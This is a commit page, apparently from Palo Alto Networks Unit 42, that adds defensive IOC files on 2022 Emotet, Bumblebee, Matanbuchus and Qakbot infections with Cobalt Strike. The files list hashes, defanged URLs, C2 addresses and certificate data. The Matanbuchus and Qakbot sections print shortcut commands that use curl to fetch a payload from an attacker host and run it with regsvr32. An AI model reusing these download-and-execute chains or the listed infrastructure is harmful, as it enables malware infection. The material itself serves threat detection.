Add files via upload

PaloAltoNetworks · Jan 29, 2024 · 01e15ac · 01e15ac
1 parent 4d68178
commit 01e15ac
Show file tree

Hide file tree

Showing 9 changed files with 701 additions and 0 deletions.
diff --git a/2022-06-07-IOCs-for-Emotet-with-Cobalt-Strike.txt b/2022-06-07-IOCs-for-Emotet-with-Cobalt-Strike.txt
@@ -0,0 +1,61 @@
+2022-06-07 (TUESDAY) - EMOTET EPOCH 5 INFECTION WITH COBALT STRIKE AND SPAMBOT ACTIVITY
+
+REFERENCE:
+
+- https://twitter.com/Unit42_Intel/status/1534552599428485120
+
+NOTE:
+
+- Cobalt Strike domain and IP address previously reported on Twitter by @drb_ra (C2IntelFeedsBot) at:
+  https://twitter.com/drb_ra/status/1532181243915296768
+
+ASSOCIATED MALWARE:
+
+- SHA256 hash: 6bbce57af634b5a56f4e412c52d987d3c2515089fc82be156c3de564564b25ba
+- File size: 72,704 bytes
+- File name: 07062022.xls
+- File description: Excel file with macro for Emotet epoch 5
+
+- SHA256 hash: fb81974d0004fb7c6c57d51386b654fa0e9bed01def37090106508f943b69ed3
+- File size: 669,116 bytes
+- File location: hxxps://chobemaster[.]com/components/GxCs/
+- File location: C:\Users\[username]\haics1.ocx
+- File location: C:\Users\[username]\AppData\Local\[random letters]\[random letters].dll
+- File description: 64-bit DLL for Emotet epoch 5
+- Run method: regsvr32.exe [filename]
+
+- SHA256 hash: 5d12e2caa2dc7a0669ce5ea96e919f6c6b7669d23534ba64c55df3b63a465ca1
+- File size: 669,116 bytes
+- File location: hxxps://bencevendeghaz[.]hu/wp-includes/S1mIEUnClr5s8krOm/
+- File location: C:\Users\[username]\haics2.ocx
+- File location: C:\Users\[username]\AppData\Local\[random letters]\[random letters].dll
+- File description: 64-bit DLL for Emotet epoch 5
+- Run method: regsvr32.exe [filename]
+
+URLS FOR EMOTET EPOCH 5 DLL:
+
+- hxxps://chobemaster[.]com/components/GxCs/
+- hxxps://bencevendeghaz[.]hu/wp-includes/S1mIEUnClr5s8krOm/
+- hxxp://vibesapparels[.]com/dQa/Qzuqq5TZO/
+
+EMOTET C2 TRAFFIC:
+
+- 58.96.74[.]42 port 443 - HTTPS traffic
+- 62.141.45[.]103 port 443 - HTTPS traffic
+- 68.183.62[.]61 port 8080 - HTTPS traffic
+- 114.79.130[.]68 port 8080 - HTTPS traffic
+- 116.125.120[.]88 port 443 - HTTPS traffic
+- 128.199.93[.]156 port 8080 - HTTPS traffic
+- 134.209.164[.]181 port 8080 - HTTPS traffic
+- 159.65.163[.]220 port 443 - HTTPS traffic
+- 173.249.25[.]219 port 443 - HTTPS traffic
+- 190.107.19[.]180 port 8080 - HTTPS traffic
+- 212.83.184[.]188 port 8080 - HTTPS traffic
+
+COBALT STRIKE TRAFFIC:
+
+- 37.0.8[.]252 port 443 - lentgenn.com - HTTPS traffic
+
+SPAMBOT TRAFFIC (ENCRYPTED SMTP):
+
+- various IP addresses over TCP ports associated with SMTP like 25, 465, and 587
diff --git a/2022-06-09-IOCs-from-TA578-Bumblebee-with-Cobalt-Strike.txt b/2022-06-09-IOCs-from-TA578-Bumblebee-with-Cobalt-Strike.txt
@@ -0,0 +1,85 @@
+2022-06-09 (THURSDAY) - TA578 CONTACT FORMS CAMPAIGN --> BUMBLEBEE --> COBALT STRIKE:
+
+REFERENCE:
+
+- https://twitter.com/Unit42_Intel/status/1535267801384235008
+
+REFERENCE:
+
+- https://twitter.com/malware_traffic/status/1534950475690295296
+
+EXAMPLE OF TA578 CONTACT FORMS CAMPAIGN "STOLEN IMAGES EVIDENCE" PAGE:
+
+- hxxps://storage.googleapis[.]com/bcxkja6v4u8de4.appspot.com/ri9s/f/d/s/f8bP4VVdWO0WA.html?d=086573710585143249
+
+URL CALLED BY THE ABOVE "STOLEN IMAGES EVIDENCE" PAGE:
+
+- hxxps://storage.googleapis[.]com/nvhhkqnv0s8nkz.appspot.com/f/fileGVxZ1t0ssa5C.html 
+
+- NOTE: The above URL returned base64 text used to create a malicious zip archive for this infection
+
+ASSOCIATED MALWARE:
+
+- SHA256 hash: 5b56671835254cb265c0e2d967882eadb51a7abafd82fda3105f23ec13eca325
+- File size: 897,893 bytes
+- File name: StolenImages_Evidence.zip
+- File description: Downloaded zip archive from "Stolen Images Evidence" page
+
+- SHA256 hash: f3525e18d5c7384ddb59903dab5c6518b15140ce20d8c04efe1db951b4fc39cb
+- File size: 2,752,512 bytes
+- File name: StolenImages_Evidence.iso
+- File description: ISO image extracted from the above zip archive
+
+- SHA256 hash: e105a1d7fae4d0cb63d068b328d83d41e07b7b27b2bfdc65b2e47c5dfb90466b
+- File size: 2,061 bytes
+- File name: documents.lnk
+- File description: Windows shorcut contains in above ISO image
+- Command from shortcut: C:\Windows\System32\cmd.exe/c start docum.bat
+
+- SHA256 hash: f17420ec26a57d29eefd782b046a8c7be41bc1da1d9bf08313e6fc83ccca333e
+- File size: 39 bytes
+- File name: docum.bat
+- File description: Hidden batch file contained in ISO image
+- Batch file content: @start RunDll32 parelmo2.dll,nHqRHTKVae
+
+- SHA256 hash: f3d6cc38e35b0738ac5968f8c15404bbe17a1cc00cd6af03b99942e3d9174c8e
+- File size: 1,261,568 bytes
+- File name: parelmo2.dll
+- File description: 64-bit DLL for Bumblebee malware
+
+BUMBLEBEE C2 TRAFFIC:
+
+- 145.239.30[.]26 port 443 - HTTPS traffic
+
+HTTPS traffic to suspicious Amazon AWS server:
+
+- 18.118.156[.]145 port 443 - ec2-18-118-156-145.us-east-2.compute.amazonaws[.]com - HTTPS traffic
+
+COBALT STRIKE TRAFFIC:
+
+- 23.82.141[.]226 port 443 - zupeyico[.]com - HTTPS traffic
+
+SELF-SIGNED CERTIFICATE ISSUER DATA FOR BUMBLEBEE HTTPS C2 TRAFFIC:
+
+- id-at-countryName=AU
+- id-at-stateOrProvinceName=Some-Staste
+- id-at-organizationName=Internet Widgits Pty Ltd
+
+CERTIFICATE ISSUER DATA FOR HTTPS TRAFFIC TO SUSPICIOUS AMAZON AWS SERVER:
+
+- id-at-countryName=US
+- id-at-stateOrProvinceName=KY
+- id-at-organizationName=Denesik-Walsh
+- id-at-organizationUnitName=system
+- id-at-commonName=denesik.walsh.biz
+- [email protected]
+
+SECTIGO CERTIFICATE ISSUER DATA FOR COBALT STRIKE HTTPS TRAFFIC:
+
+- id-at-countryName=GB
+- id-at-stateOrProvinceName=Greater Manchester
+- id-at-localityName=Salford
+- id-at-organizationName=Sectigo Limited
+- id-at-commonName=Sectigo RSA Domain Validation Secure Server CA
+
+- NOTE: Sectigo is a legitimate Certificate Authority (CA), and criminals occasionally use Sectigo certificates for their Cobalt Strike servers.
diff --git a/2022-06-14-IOCs-from-TA578-Bumblebee-with-Cobalt-Strike.txt b/2022-06-14-IOCs-from-TA578-Bumblebee-with-Cobalt-Strike.txt
@@ -0,0 +1,59 @@
+2022-06-14 (TUESDAY) - TA578 THREAD-HIJACKED EMAIL --> BUMBLEBEE --> COBALT STRIKE:
+
+REFERENCE:
+
+- https://twitter.com/Unit42_Intel/status/1536820531227418630
+
+ORIGINAL REFERENCE:
+
+- https://bazaar.abuse.ch/sample/f17744df579de5a9b657299f909d32fd3ef60812f1b0d4f6e7ea518d2f571a39/
+
+ASSOCIATED MALWARE:
+
+- SHA256 hash: f17744df579de5a9b657299f909d32fd3ef60812f1b0d4f6e7ea518d2f571a39
+- File size: 956,787 bytes
+- File name: June-14-Request-Scan_103_docx.zip
+- File description: zip archive attached to email
+
+- SHA256 hash: 3499d4981c2a23681954b74793976d8d99e097a905bacd2c3d4e77855e90e4d9
+- File size: 3,211,264 bytes
+- File name: June-14-Request-Scan_103_docx.iso
+- File description: ISO image extracted from the above zip archive
+
+- SHA256 hash: 7ea93d3194137b5e8e11609733b6d1dbefda22cc1e129e25a06e8623f2bbc3e3
+- File size: 2,098 bytes
+- File name: documents.lnk
+- File description: Windows shortcut contained in above ISO image
+- Command from shortcut: C:\Windows\System32\rundll32.exe toso3l.dll,LyirJCyvGh
+
+- SHA256 hash: 2e349b3224cc0d958e6945623098c2d28cc8977e0d45480c0188febbf7b8aa78
+- File size: 1,764,864 bytes
+- File name: toso3l.dll
+- File description: 64-bit DLL for Bumblebee malware
+- Run method: rundll32.exe [filename],LyirJCyvGh
+
+BUMBLEBEE C2 TRAFFIC:
+
+- 193.233.203[.]156 port 443 - HTTPS traffic
+- 39.57.152[.]217 port 440 - attempted TCP connections
+- 69.161.201[.]181 port 382 - attempted TCP connections
+
+COBALT STRIKE TRAFFIC:
+
+- 172.93.181[.]105 port 443 - hocavopeh[.]com - HTTPS traffic
+
+SELF-SIGNED CERTIFICATE ISSUER DATA FOR BUMBLEBEE HTTPS C2 TRAFFIC:
+
+- id-at-countryName=AU
+- id-at-stateOrProvinceName=Some-Staste
+- id-at-organizationName=Internet Widgits Pty Ltd
+
+SECTIGO CERTIFICATE ISSUER DATA FOR COBALT STRIKE HTTPS TRAFFIC:
+
+- id-at-countryName=GB
+- id-at-stateOrProvinceName=Greater Manchester
+- id-at-localityName=Salford
+- id-at-organizationName=Sectigo Limited
+- id-at-commonName=Sectigo RSA Domain Validation Secure Server CA
+
+- NOTE: Sectigo is a legitimate Certificate Authority (CA), and criminals occasionally use Sectigo certificates for their Cobalt Strike servers.
diff --git a/2022-06-17-IOCs-for-Matanbuchus-with-Cobalt-Strike.txt b/2022-06-17-IOCs-for-Matanbuchus-with-Cobalt-Strike.txt
@@ -0,0 +1,98 @@
+2022-06-17 (FRIDAY) - MATANBUCHUS ACTIVITY WITH COBALT STRIKE
+
+REFERENCE:
+
+- https://twitter.com/Unit42_Intel/status/1537904451108818946
+
+14 EXAMPLES OF GOOGLE DRIVE URLS HOSTING MALICIOUS ZIP ARCHIVES:
+
+- hxxps://drive.google[.]com/uc?export=download&id=1ZLKo89rNAwoXslj5L5MAIooU2WuqwAZp&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1p3kFRq4CNWCIOs0CXEdxuRZ_Yq02hYeV&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1XK3UBhCLs1XrT0TGLQThBAU5Ts5Zax15&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1FTs2987MLLW9S6XyzHjixv-hnku8wRRJ&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1-CAdGFHqjgRH7Trbhu9Uevsw8FEwiWCH&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=14AH-8OnIg8NJZIE_jjtBOYbOUWqgA4sq&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1vOmfVjrqu31rgmAOVvJjzUus3mim8FAW&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1_NiYYabxFarNvGlo1Z_4DzZ8sGbJLRcy&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=13bK7sNO1-HvLuwBhR1vipi_PL3iRAZjI&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1a-q2mpzjiab024WPwweQ75h3PoB62hU0&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1OCsLdZApFPGqE386n4_poqo0oazHOFPQ&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1IikXt7oUrcQJ4q5BdOdu61i9je6gSqrR&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=17dqStecgoaRGMCO5doPptvm67rC1Lddg&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1mXJNgeAGYha_pUHNvJUNDjOZ8PeO7fXQ&confirm=t
+
+SHA256 HASHES FOR 14 ZIP ARCHIVES DOWNLOADED FROM THE ABOVE URLS:
+
+- 82f967b7ae4919cd4b1ead95744ec6e43975934e93c35d59e58112f83c3c9845  AreaDoc1640.zip
+- 1ecd6f53ea94c669e847d6255276354a4f6528a8266391721bfb2d05fc2cad70  AreaDoc2687.zip
+- 4fffb80c1ab1ce17099b1ba7773cd317bc2c0cd2d3d30b408bfc1e2b0215c1e7  AreaDoc3024.zip
+- 34286ec7af686e5e1cc244e489918fc00c903e8648e986d07ba2dfe01da889f6  AreaDoc3634.zip
+- bd1b0045a4931e480d455b5f5906259e3120170de2e8ec848bc8f051fc937d55  AreaDoc3768.zip
+- d9cc0335b5f68f089caca67932c5b28df82fa31939ebcae170a3f5b3f57207d2  AreaDoc4872.zip
+- 7440d36eabf9ce73a59f2bd5b89a9b0e2e36a7960855d160373150e4fef7db1d  AreaDoc4921.zip
+- 4980938f86123a8e45b58c523d2ade1694636e8d2a8e34fd2e5d4534c9271768  AreaDoc4945.zip
+- cfffc9f756fdf4065b60c8936569c0d97ccee9c8fdb1ee375f995108fa43c686  AreaDoc5122.zip
+- 57bac98d0b96c937a3671506ce5399331ddf535542f77f4df3f0dfb9edac4c54  AreaDoc6195.zip
+- 0808e0f13a59b678113cc0b3f7fdcc70c28a44b441cfa7651e5d40e17f50e624  AreaDoc7702.zip
+- de888888dfdb76a9c34de94511b88ae355eb1c9fb38f3ccd8a4e73054c2257c3  AreaDoc8084.zip
+- 55f835ad315d139296458147524f1f32a22b62f4fe33046850888fce6f72e648  AreaDoc9209.zip
+- 8d9c315fafebc7b19b1a5153b95b5e4e0ed103e86c09c9b1db1a620a71504889  AreaDoc9547.zip
+
+SHA256 HASHES FOR 14 WINDOWS SHORTCUTS EXTRACTED FROM THE ABOVE ZIP ARCHIVES:
+
+- b725ca302134e81ba9f67f1a5549fe8189c1d2d53a899ec120326f948270dbae  AreaDoc264.lnk
+- fe0a79d00d28faafa84194854d71bfc5e6d71b6be13661c56a8868d2e9dff716  AreaDoc301.lnk
+- 16ed14f7e99e7ddd5ae9ea259dfe0999a922f1d8b2b0fe033a1f2a42ce0ad92c  AreaDoc355.lnk
+- 4692a6f5073f644e50617d4bb5b2236ab60384c1840a00fc1dd7c768641f53f1  AreaDoc385.lnk
+- 7b228f22b1ca0f688fc8d00e29c7e06f50863ede0e990f3502c1773f69cef771  AreaDoc419.lnk
+- a19a8cc39ca3a0ea3571bd06c3c3421f2def635e7dfe72c460c10ccf34817e0e  AreaDoc450.lnk
+- d8c21ff6fe4617b22ff37e74a1d29adb08d3164d43d7ed205c207964f4313a72  AreaDoc522.lnk
+- 34bc60943b067fdbbf72c56df7d57be9d1c9004258d4460b6e25861abaa91009  AreaDoc594.lnk
+- d5bfc2ef6d5dbc61959ba64a5bf5305e8da13e569b4a8a138e79f86a44e38d75  AreaDoc712.lnk
+- ab0cab19bc483933300f20591c34d2871258cf4de1e2c19821c9899d05b33651  AreaDoc781.lnk
+- e7f1e2f604d1137c168e3bb89b6b7bce0c552274561857452b9b92f99bd468cc  AreaDoc785.lnk
+- d17d6c0ec32fdd15b8219513bc4157aacc699ce00e905ead59059f8875fcde85  AreaDoc866.lnk
+- 5a37dbc0fa047493c25e7873f7d187319a2dafb96882dff574d1bf201de487bb  AreaDoc987.lnk
+- 9730e27a56864601d6dc2ea911b02c2599dbb2c61aa3ef5363891b90735a9e78  AreaDoc994.lnk
+
+COMMANDS RUN BY THE ABOVE WINDOWS SHORTCUTS:
+
+C:\Windows\System32\cmd.exe /q /c echo 'FJ' 
+&& MD "%USERPROFILE%\fm_j" 
+&& curl.exe --output %USERPROFILE%\fm_j\ooTCNA.Hcw.Thw hxxps://slgemseller[.]com/rmaS/Es.png 
+&& regsvr32 -e -n -i:"Update Installation" "%USERPROFILE%\fm_j\ooTCNA.Hcw.Thw" 
+&& ping pXl.com
+
+ASSOCIATED MALWARE:
+
+- SHA256 hash: e9d8b76f3bb2a548c7d9aaf16bf368d550c3072f9cbdca2b1a28fc4ccc065a3b
+- File size: 1,606,719 bytes
+- File location: hxxps://slgemseller[.]com/rmaS/Es.png
+- File location: C:\Users\[username]\fm_j\ooTCNA.Hcw.Thw
+- File description: Initial 32-bit DLL for Matanbuchus
+- Run method: regsvr32.exe -e -n -i:"Update Installation" [filename]
+
+- SHA256 hash: 48ad2fadb0550066f0ee1d20b73cdb397c53479152c2f3d14fe7d09b8a972117
+- File size: 1,595,904 bytes
+- File location: C:\Users\[username]\AppData\Local\a53c\x86.nls
+- File description: Persistent 32-bit DLL for Matanbuchus
+- Run method: regsvr32.exe -e -n -i:"UpdateCheck" [filename]
+
+TRAFFIC FROM AN INFECTED WINDOWS HOST:
+
+- 162.214.157.176 port 443 - hxxps://slgemseller[.]com/rmaS/Es.png
+
+TRAFFIC CAUSED BY MATANBUCHUS:
+
+- 31.41.244[.]227 port 443 - communicationreporting[.]com - HTTPS traffic
+- 31.41.244[.]230 port 443 - telemetryservic[.]com - HTTPS traffic
+- 31.41.244[.]230 port 65383 - telemetryservic[.]com - POST /KkfUWR/kFAWCs/requets/index.php
+
+TRAFFIC CAUSED BY MATANBUCHUS FOR COBALT STRIKE FILE(S):
+
+- 31.41.244[.]225 port 443 - instance-manager[.]at - HTTPS traffic
+
+COBALT STRIKE C2:
+
+- 23.82.141[.]136 port 443 - gudugil[.]com - HTTPS traffic
+- 23.82.141[.]136 port 443 - HTTPS traffic
diff --git a/2022-06-21-IOCs-for-AA-distribution-Qakbot-with-DarkVNC-and-Cobalt-Strike.txt b/2022-06-21-IOCs-for-AA-distribution-Qakbot-with-DarkVNC-and-Cobalt-Strike.txt
@@ -0,0 +1,79 @@
+2022-06-21 (TUESDAY) - AA DISTRIBUTION QAKBOT (QBOT) WITH DARK VNC AND COBALT STRIKE
+
+REFERENCE:
+
+- https://twitter.com/Unit42_Intel/status/1539700018558427140
+
+INFECTION CHAIN:
+
+- Thread-hijacked email --> link --> password-protected zip --> Windows shortcut --> Qakbot --> follow-up malware
+
+EXAMPLES OF LINKS FROM EMAILS:
+
+- hxxps://drive.google[.]com/uc?export=download&id=12YCPlGhj4bO0NWSJtS8agl52ox7D8_6G&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1fsanLKV8A93QBID-3w4URnl1DGaSvXOW&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1KNl9wwEIVZ5FOyn1BruyWwIrCslFkRGp&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1ppV4rCVKnDlJVE4WJ9PfPtiThoA0VdnO&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1sVNWr2l36_fFBrG0bSDdOMR6IqaXXNuL&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1tjQ48mlBKbF4NvzCx-3h_0e6cq_qUQBU&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1WOOtmsN4AY7YT3FEXMszp9sJZEu_80aZ&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1xCZknxKBantEN9pywyVCzhd8RQUlb663&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1XpJ53bzmOLBhicqonqfAvUQZODPOb6tO&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1yZwjAU90kJUAV1o6RStf9xSLxeS2Dv9x&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1YYjRd6O7GCIAoDawI4i6fB2mjjMtSAzm&confirm=t
+- hxxps://drive.google[.]com/uc?export=download&id=1ZXle00cAMSdXupJwtBGB-N9OFekAYPiD&confirm=t
+
+EXAMPLE OF DOWNLOADED ZIP ARCHIVE:
+
+- SHA256 hash: 311730a296273acfbec85799b25f23b4698c8cc532ca2028a55f31c8b0686b03
+- File size: 1,230 bytes
+- File name: reiciendisperferendis.zip
+- File description: password-protected zip archive downloaded from link in the email
+- Password: E98346
+
+EXTRACTED WINDOWS SHORTCUT:
+
+- SHA256 hash: c9dfafd3536977289b4bfda1369fbd113a778cf06ac0c01cdc8e00e1c300e774
+- File size: 2,093 bytes
+- File name: reiciendisperferendis.lnk
+- File description: Windows shortcut extracted from the above zip archive
+
+COMMAND ISSUED BY THE ABOVE SHORTCUT:
+
+C:\Windows\System32\cmd.exe /q /c echo 'i0' && 
+ping yrl.net && 
+MD "%HOMEPATH%\Wc\ItF5" && 
+curl.exe --output %HOMEPATH%\Wc\ItF5\t3JC.frZL.YXSA hxxps://maagayatrilogistics[.]com/WUK4Q/q.png && 
+regsvr32 -u "%HOMEPATH%\Wc\ItF5\t3JC.frZL.YXSA" 
+&& ping 0Ev.com
+
+QAKBOT DLL RETRIEVED BY THE WINDOWS SHORTCUT:
+
+- SHA256 hash: 26748f1f6c740dc9ce9c480bc0fe49416b90672567cce3d77e4f16bcb92d7662
+- File size: 739,934 bytes
+- File location: hxxps://maagayatrilogistics[.]com/WUK4Q/q.png
+- File location: C:\Users\[username]\Wc\ItF5\t3JC.frZL.YXSA
+- File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
+- Run method: regsvr32.exe [filename]
+
+QAKBOT DLL PERSISTENT ON THE INFECTED WINDOWS HOST:
+
+- SHA256 hash: 8680626d35a7528e6025ca2bfc757967847bb4d0ab4c24e56083d739dfbad9dc
+- File size: 732,599 bytes
+- File location: C:\Users\[username]\AppData\Roaming\Microsoft\Ccnwa\urdvwi.dll
+- File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
+- Run method: regsvr32.exe [filename]
+
+TRAFFIC FROM THE QAKBOT INFECTION:
+
+- 192.185.129[.]139 port 443 - hxxps://maagayatrilogistics[.]com/WUK4Q/q.png
+- 76.25.142[.]196 port 443 - Qakbot HTTPS C2 traffic
+- port 443 - www.openssl[.]org - Connectivity check by infected Windows host
+- 23.111.114[.]52 port 65400 - TCP traffic caused by Qakbot
+- port 443 - api.ipify[.]org - IP address check by infected Windows host
+- various IP addresses over various ports - Email banner traffic/SMTP activity
+
+TRAFFIC CAUSED BY FOLLOW-UP MALWARE:
+
+- 78.31.67[.]7 port 443 - DarkVNC traffic
+- 190.123.44[.]130 port 443 - trikh[.]icu - Cobalt Strike HTTPS traffic